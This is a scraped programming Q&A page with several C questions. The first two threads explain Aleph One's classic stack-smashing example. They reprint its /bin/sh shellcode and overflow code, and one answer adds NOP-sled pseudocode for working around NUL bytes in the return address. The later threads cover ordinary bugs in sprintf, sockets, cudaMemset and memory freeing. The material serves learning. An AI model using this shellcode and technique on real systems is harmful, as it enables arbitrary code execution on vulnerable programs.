Understanding Aleph One's first buffer overflow exploit

Understanding Aleph One's first buffer overflow exploit - c

I am reading "Smashing The Stack For Fun And Profit" by Aleph one, and reached this spot:
overflow1.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
Now, I understand all the theory behind the exploit:
the shellcode[] is in the data segment (which is writable), and contains the code to spawn a shell.
We would like to copy its content to main's buffer, in addition to overwrite main's return address to the beginning of the buffer (so that the execution control will be of our "spawning a shell" code. We do it by coping the shellcode to the large_string[] buffer (second for-loop), and the rest(???) of large_sting[] will contain the buffer's address (first for-loop).
Of course, main's return address will be overwritten by this buffer's address, since we copy large_string[] to buffer[] (strcpy).
My problem is with the little details of the exploit:
1.)
Why does the first for-loop is from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]
2.)
What is srlen(shellcode)?
I would some clearing on that kind of stuff.
Thanks!

1) Why does the first for-loop is from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]
It copies four bytes at a time (it relies on knowing that sizeof(int) is 4 on the target platform), and 32 * 4 == 128.
2) What is srlen(shellcode)?
It's the number of bytes in shellcode (this relies on the fact that shellcode does not contain embedded \0 characters).

Related

Avoid NUL Terminating Character for Stack Smashing with strcpy()

I have recently been following aleph1's Smashing The Stack For Fun And Profit paper, and I've reached a part where I am unable to smash the stack with strcpy.
In the chapter titled: "Writing an Exploit(or how to mung the stack)", aleph1 writes the following code (which I tried to run my computer):
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
What we have done above is filled the array large_string[] with the
address of buffer[], which is where our code will be. Then we copy our
shellcode into the beginning of the large_string string. strcpy() will then
copy large_string onto buffer without doing any bounds checking, and will
overflow the return address, overwriting it with the address where our code
is now located. Once we reach the end of main and it tried to return it
jumps to our code, and execs a shell.
This code works exactly as it's supposed to for me until it gets to this line:
strcpy(buffer,large_string);
After lots of digging around, I found out that strcpy doesn't overflow buffer as it should, because the address of buffer (which is copied many times into large_string) has NUL string-terminating zeros in it.
Therefore, strcpy() stops after the first NUL it runs into, which is well before we overwrite the return address of main with buffer's address.
Is there a way to solve this problem and somehow make the address of buffer not have any zeroes in it?

I guess you are using the Windows operating system and little endian processor, that's because as far as i know linux puts the address code from above so linux usually doesn't have a NULL byte in address. Different from windows which start from a low address so that it contains NULL byte. There is a trick which is to add enough NOP instruction in your shellcode until it overwrite the return address. Because your address contain NULL byte, you only write the return address once (strcpy stop at NULL byte). In order to do this you should look at the assembly and calculate the exact size of the shellcode needed and then put the target return address afterward.
Here are the pseudo
// &ret_addr is address of where your target_return_addres to be stored.
// To get it:
// view in debugger
// break at first instruction in main. Usually push ebp instruction
// look ESP register value
a = &ret_addr - &buffer // [NOP] + [SHELLCODE]
// fill large_string with return address
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
// fill large_string with NOP
n = a - strlen(shellcode)
for (i = 0; i < n; i++)
large_string[i] = NOP;
// fill large_string with your shellcode
for (i = 0; i < strlen(shellcode); i++)
large_string[n+i] = shellcode[i];
At the end large_string will look like this
[n bytes] [strlen(shellcode) bytes] [Rest Bytes]
[NOP] [SHELLCODE] [RETURN ADDRESS]
and buffer will look like this
[n bytes] [strlen(shellcode) bytes] [4 Bytes]
[NOP] [SHELLCODE] [RETURN ADDRESS]
Remember this will work if NX bit and stack canaries are turned off. Try it in debugger to understand it very well

Buffer overrun issue reported by static code analysis tool

My piece of code:
void temp(char *source)
{
char dest[41];
for(int i = 0; i < 20; i++)
{
sprintf(&dest[i*2], "%02x", (unsigned int)source[i]);
}
}
When I run the static code analysis tool, I get the warning below:
On 19th iteration of the loop : This code could write past the end of the buffer pointed to by &dest[i * 2]. &dest[i * 2] evaluates to [dest + 38]. sprintf() writes up to 9 bytes starting at offset 38 from the beginning of the buffer pointed to by &dest[i * 2], whose capacity is
41 bytes.The number of bytes written could exceed the number of allocated bytes beyond that offset. The overrun occurs in stack memory.
My question is: since in every loop iteration, we are only copying 2 bytes (considering size of unsigned int on the machine is 2 bytes) from source to destination, where is the possibility of copying 9 bytes on the last iteration?

char can be signed, and is so by default in x86 compilers. On my computer
#include <stdio.h>
int main(void) {
printf("%02x\n", (unsigned int)(char)128);
}
prints ffffff80.
What you want to do is use format "%02hhx" and argument (unsigned char)c.

Parse single message coming over socket containing 2 strings in C

I'm trying to read a message that contains 2 strings. This message contains 2 strings that could be anything, and it is sent over a socket.
Note that I'm using C in Ubuntu environment.
The format of the message is, in a single void* buffer:
[string1]\0[string2]\0
I figured I'd be able to separate them once they arrive, using the '\0' to figure out where to split them. I'm using a function to read just the string and it sort of works, but I keep getting complaints from Valgrind, and I don't understand why.
I'm going to use an example where only 1 string is read from the buffer, but I mention the strategy because I'm not able to just put the message into a char* buffer. I need the function to extract a string from more complex buffers.
It all starts like this:
void* buffer = malloc(msgSize * sizeof(char)); //the message size is properly calculated to include the '\0' at the end
char* instanceId = malloc(msgSize * sizeof(char));
if(recv(socket_desc, (void*) buffer, msgSize * sizeof(char), MSG_WAITALL) <= 0) {
log_error(logger, "Message failed.");
return;
}
bufferToString(buffer, &instanceId, 0);
bufferToString2(buffer, instanceId, 0);
I made several attempts to make bufferToString work, as you can see... Of course I don't invoke them all at the same time, but I want to share those lines in case I'm making a mistake there.
Attempt #Number 1: char by char
int bufferToString(void* buffer, char** string, int startPtr) {
//startPtr can be used to read strings that are in the middle of a buffer
char a;
int thisStringPtr = 0;
do {
a = *(char*) (buffer + startPtr);
(*string)[thisStringPtr] = a;
startPtr++;
thisStringPtr++;
} while (a != '\0');
return startPtr; //return end position to use for extracting more values later
}
This one complains:
==23047== Invalid read of size 1
==23047== at 0x403A27A: bufferToString (buffer.c:16)
==23047== by 0x804A0C2: handleHiloInstancia (coordinador.c:232)
==23047== by 0x8049C54: procesarConexion (coordinador.c:85)
==23047== by 0x4066294: start_thread (pthread_create.c:333)
==23047== by 0x41650AD: clone (clone.S:114)
==23047== Address 0x423bc8a is 0 bytes after a block of size 10 alloc'd
==23047== at 0x402C17C: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==23047== by 0x804A063: handleHiloInstancia (coordinador.c:225)
==23047== by 0x8049C54: procesarConexion (coordinador.c:85)
==23047== by 0x4066294: start_thread (pthread_create.c:333)
==23047== by 0x41650AD: clone (clone.S:114)
Line 16 of bufferToString is the first line inside the do statement.
Attempt 2: cast and copy
int bufferToString2(void* buffer, char* string, int startPtr) {
strcpy(string, (char*) (buffer + startPtr));
return (strlen(string) + 1)*sizeof(char);
}
With or without the +startPtr, this causes slightly different problems:
==23190== Invalid read of size 1
==23190== at 0x402F489: strcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==23190== by 0x403A1E3: bufferToString2 (buffer.c:3)
==23190== by 0x804A0C1: handleHiloInstancia (coordinador.c:232)
==23190== by 0x8049C54: procesarConexion (coordinador.c:85)
==23190== by 0x4066294: start_thread (pthread_create.c:333)
==23190== by 0x41650AD: clone (clone.S:114)
==23190== Address 0x423bc8a is 0 bytes after a block of size 10 alloc'd
I tried a few other combinations (like using char** string and all the required modifications in bufferToString2), but I keep getting similar error messages. What am I not seeing?
UPDATE: How message is being sent:
int bufferSize;
void* buffer = serializePackage(HANDSHAKE_INSTANCE_ID ,instancia_config->nombre, &bufferSize );
printf("Buffer size: %i - Instancia Name = %s - Socket num: %i\n", bufferSize, instancia_config->nombre, socket_coordinador); //this shows right data
if (send(socket_coordinador,buffer,bufferSize, 0) <= 0) {
log_error(logger, "Could not send ID.");
endProcess(EXIT_FAILURE);
}
instancia_config->nombre is of type char*
void* serializePackage(int codigo,char * mensaje, int* tamanioPaquete){
int puntero = 0;
int length = strlen(mensaje);
int sizeOfPaquete = strlen(mensaje) * sizeof(char) + 1 + 2 * sizeof(int);
void * paquete = malloc(sizeOfPaquete);
memcpy((paquete + puntero) ,&codigo,sizeof(int));
puntero += sizeof(int);
memcpy((paquete + puntero),&length,sizeof(int));
puntero += sizeof(int);
memcpy((paquete + puntero),mensaje,length * sizeof(char) + 1);
*tamanioPaquete = sizeOfPaquete;
return paquete;
}

Do you have your src and dst the right way around?
The destination (or target if you prefer) of memory services in C is the first parameter, so:
strcpy(string, buffer)
will copy buffer into string. (https://www.tutorialspoint.com/c_standard_library/c_function_strcpy.htm)
But: bufferToString2 is being called with buffer as the first parameter (and it's the source in this case).
In the first case, as was pointed out, you can't do arithmetic on a void* because the math is trying to go to the Nth element if you say:
*(x + N)
and if x is 'void' it has no size, and therefore the Nth element isn't meaningful.

Since there is not an answer yet that eventually solved the problem ostensibly, and no further progress on this question, I will summarize what I partially mentioned in my comments to at least provide hints where to start looking for the problem:
A lot of information is, unfortunately, missing to seriously treat this question.
For example, which kind of socket do you use to send / receive your messages?
Is it a pipe, or a network socket - which kind of transport do you use then?
How do you ensure that you received the entire message?
You should at least check the return value of recv (which happens to be the number of received octets) and check with the expected length if there is one.
When having received your message,have the message dumped as is - if you are not familiar with using a debugger, a function like this would do as a starter:
void dump(const char* buffer, size_t length) {
for(size_t i = 0; i < length; ++i) {
printf("%x", buffer[i] & 0xff);
}
printf("\n");
}
and invoke it in your code after the ssize_t received = recv(...) like dump(buffer, received).
Furthermore, you don't provide the way you calculate msgSize in your first code snippet - how do you guarantee that the string in mensaje you pass over to serializePacket is not longer than msgSize ?
Then, in serializePacket, you create a buffer filled like this:
| codigo (int) | length (int) | mensaje ( = terminal zero) |
but what you read back at the other end is just a c string - you ought to read the 2 ints as well, ought you not?
Then, there is another problem with this bit of serialization: Even if you read back the 2 ints, you would have a piece of code that is entirely unportable and works only if both sender and receiver run on an architecture that represent ints precisely the same way and in the same bit order. if you run the sender on a 32 bit system and the receiver on a 64 bit system, you write 4 byte integers, while attempt to read back 8 byte integers. Better use
types with precisely defined width (like uint32_t from inttypes.h ) and explicitly convert to/from network byte order using e.g. ntohl(3) / htonl(3).
Lastly, I want to add some remarks to improve the quality of code, that might prevent a lot of potential errors:
Take as example your bufferToString:
You passed in string as char** - why?
Use appropriate data types - don't use a signed int where you deal with non-negative sizes - use the standard type size_t instead
Don't use void* as type unless really necessary - you loose a hell lot of compile time error checking. C automatically converts from void* in assignments. So declaring buffer as char* is highly suggested.
This function, e.g. can harshly be simplified:
size_t bufferToString(const char* buffer, char* string, size_t offset) {
for(size_t i = offset; 0 != buffer[i]; ++i) {
string[i] = buffer[i];
}
return ++i;
}
I can only emphazise that network code tends to be hard to debug - there are all kinds of external error sources you cannot really oversee.
Hopefully these hints help to track down the root cause of your problem.

Strange behaviour of an elementary CUDA code.

I am having trouble understanding the output of the following simple CUDA code. All that the code does is allocate two integer arrays: one on the host and one on the device each of size 16. It then sets the device array elements to the integer value 3 and then copies these values into the host_array where all the elements are then printed out.
#include <stdlib.h>
#include <stdio.h>
int main(void)
{
int num_elements = 16;
int num_bytes = num_elements * sizeof(int);
int *device_array = 0;
int *host_array = 0;
// malloc host memory
host_array = (int*)malloc(num_bytes);
// cudaMalloc device memory
cudaMalloc((void**)&device_array, num_bytes);
// Constant out the device array with cudaMemset
cudaMemset(device_array, 3, num_bytes);
// copy the contents of the device array to the host
cudaMemcpy(host_array, device_array, num_bytes, cudaMemcpyDeviceToHost);
// print out the result element by element
for(int i = 0; i < num_elements; ++i)
printf("%i\n", *(host_array+i));
// use free to deallocate the host array
free(host_array);
// use cudaFree to deallocate the device array
cudaFree(device_array);
return 0;
}
The output of this program is 50529027 printed line by line 16 times.
50529027
50529027
50529027
..
..
..
50529027
50529027
Where did this number come from? When I replace 3 with 0 in the cudaMemset call then I get correct behaviour. i.e.
0 printed line by line 16 times.
I compiled the code with nvcc test.cu on Ubuntu 10.10 with CUDA 4.0

I'm no cuda expert but 50529027 is 0x03030303 in hex. This means cudaMemset sets each byte in the array to 3 and not each int. This is not surprising given the signature of cuda memset (to pass in the number of bytes to set) and the general semantics of memset operations.
Edit: As to your (I guess) implicit question of how to achieve what you intended I think you have to write a loop and initialize each array element.

As others have pointed out, cudaMesetworks like the standard C memset- it sets byte values. From the CUDA documentation:
cudaError_t cudaMemset( void * devPtr, int value, size_t count)
Fills the first count bytes of the memory area pointed to by devPtr
with the constant byte value value.
If you want to set word size values, the best solution is to use your own memset kernel, perhaps something like this:
template<typename T>
__global__ void myMemset(T * x, T value, size_t count )
{
size_t tid = threadIdx.x + blockIdx.x * blockDim.x;
size_t stride = blockDim.x * gridDim.x;
for(int i=tid; i<count; i+=stride) {
x[i] = value;
}
}
which could be launched with enough blocks to cover the number of MP in your GPU, and each thread will do as many iterations as required to fill the memory allocation. Writes will be coalesced, so performance shouldn't be too bad. This could also be adapted to CUDA's vector types, if you so desired.

memset sets bytes, and integer is 4 bytes.. so what you get is 50529027 decimal, which is 0x3030303 in hex... In other words - you are using it wrong, and it has nothing to do with CUDA.

This is a classic memset shortcoming; it works only on data type with 8-bit size i.e char. This means it sets (probably) 3 to every 8-bits of the total memory. You can confirm this by a simple C++ code:
int main ()
{
int x=16;
size_t bytes = x*sizeof(int);
int *M = (int*)malloc(bytes);
memset(M,3,bytes);
for (int i = 0; i < x; ++i) {
printf("%d\n", M[i]);
}
return 0;
}
The only case in which memset works on all data types is when you set it to 0. (it sets every byte to 0 and hence all data to 0). If you change the data type to char, you'll see the desired output. cudaMemset is ditto copy of memset with the only difference that it takes a GPU pointer in input.
So memset or cudaMemset probably sets every byte to the integer value (in your case 3) of whole memory space defined by the third argument regardless of the datatype.
Tip:
Google: 50529027 in binary and you'll get the answer :)

Memory loss in following code when the CPU is 32 bit processor

I have a function to convert integer to string .The function is
char * Int_String(int Number)
{
char* result;
NAT size = 1;
if (Number > 9) {
size = (NAT)log10((double) Number) + 1;
} else if (Number < 0) {
size = (NAT)log10((double) abs(Number)) + 2; /* including '-' */
}
size++; /* for '\0' */
result = (char *) memory_Malloc(sizeof(char) * size);
sprintf(result, "%d", Number);
return result;
}
NAT is typedef unsigned int
Number is int
I am using this function in the following manner
char *s2;
char **Connections;
Connections = memory_Malloc(nc*sizeof(char*));
char con[]="c_";
k1=1;
for (i=0; i<nc ; i++){
s2 = Int_ToString(k1);
Connections[i]= string_Conc(con,s2);
string_StringFree(s2);
k1= k1+1;
}
And the functionschar* string_Conc(const char *s1, const char *S2) is
{
char* dst;
dst = memory_Malloc(strlen(s1) + strlen(s2) + 1);
strcpy(dst, s1);
return strcat(dst,s2);
}
I am using following methods to free its memory:
for(i=0; i<nc; i++){
memory_Free(Connections[i],sizeof(char));
}
memory_Free(Connections,nc*sizeof(char*));
The problem that i am getting is: i can free all the allocated memory when nc<=9.But when it is >=10 leakes memory in the multiple of 4 bytes with each increase in number. How can I remove the problem.Any help will be appreciated.
EDIT
void memory_Free(POINTER Freepointer, unsigned int Size)
Thanks,
thetna

You don't show the implementation of memory_Free (neither memory_Malloc), so we don't know why you need to pass the supposed size of the memory block to be freed as a 2nd parameter (the standard free() doesn't need this). However, here
memory_Free(Connections[i],sizeof(char));
it is certainly wrong: sizeof(char) is 1 on most platforms, but the size of the allocated block is at least 4 bytes for each string in the array (as the strings contain "c_" plus at least one digit plus the terminating '\0').
Update
Looking through the source code you linked, this indeed seems to be the cause of your problem! The code inside memory_Free seems to align memory block sizes - I can assume that to 4-byte boundaries, which is very common. In this case, if the passed Size is 1, it happens to be corrected to 4 - exactly the right value in case of single digit numbers as shown above! However, numbers greater than 9 are converted to (at least) two digits, thus the size of the converted string is already 5. A block of 5 bytes is most probably allocated as an aligned block of 8 bytes under the hood - but since memory_Free is always called with a Size of 1, it always frees only 4 bytes. This leaves 4 bytes leaking per each number above 9, precisely as you described in your comment above!
To fix this, you need to modify the line above to
memory_Free(Connections[i], strlen(Connections[i]) + 1);

Develop Reference

c reactjs sql-server angularjs arrays wpf database batch-file google-app-engine silverlight

Understanding Aleph One's first buffer overflow exploit - c

Related

Avoid NUL Terminating Character for Stack Smashing with strcpy()

Buffer overrun issue reported by static code analysis tool

Parse single message coming over socket containing 2 strings in C

Strange behaviour of an elementary CUDA code.

Memory loss in following code when the CPU is 32 bit processor

Categories

Resources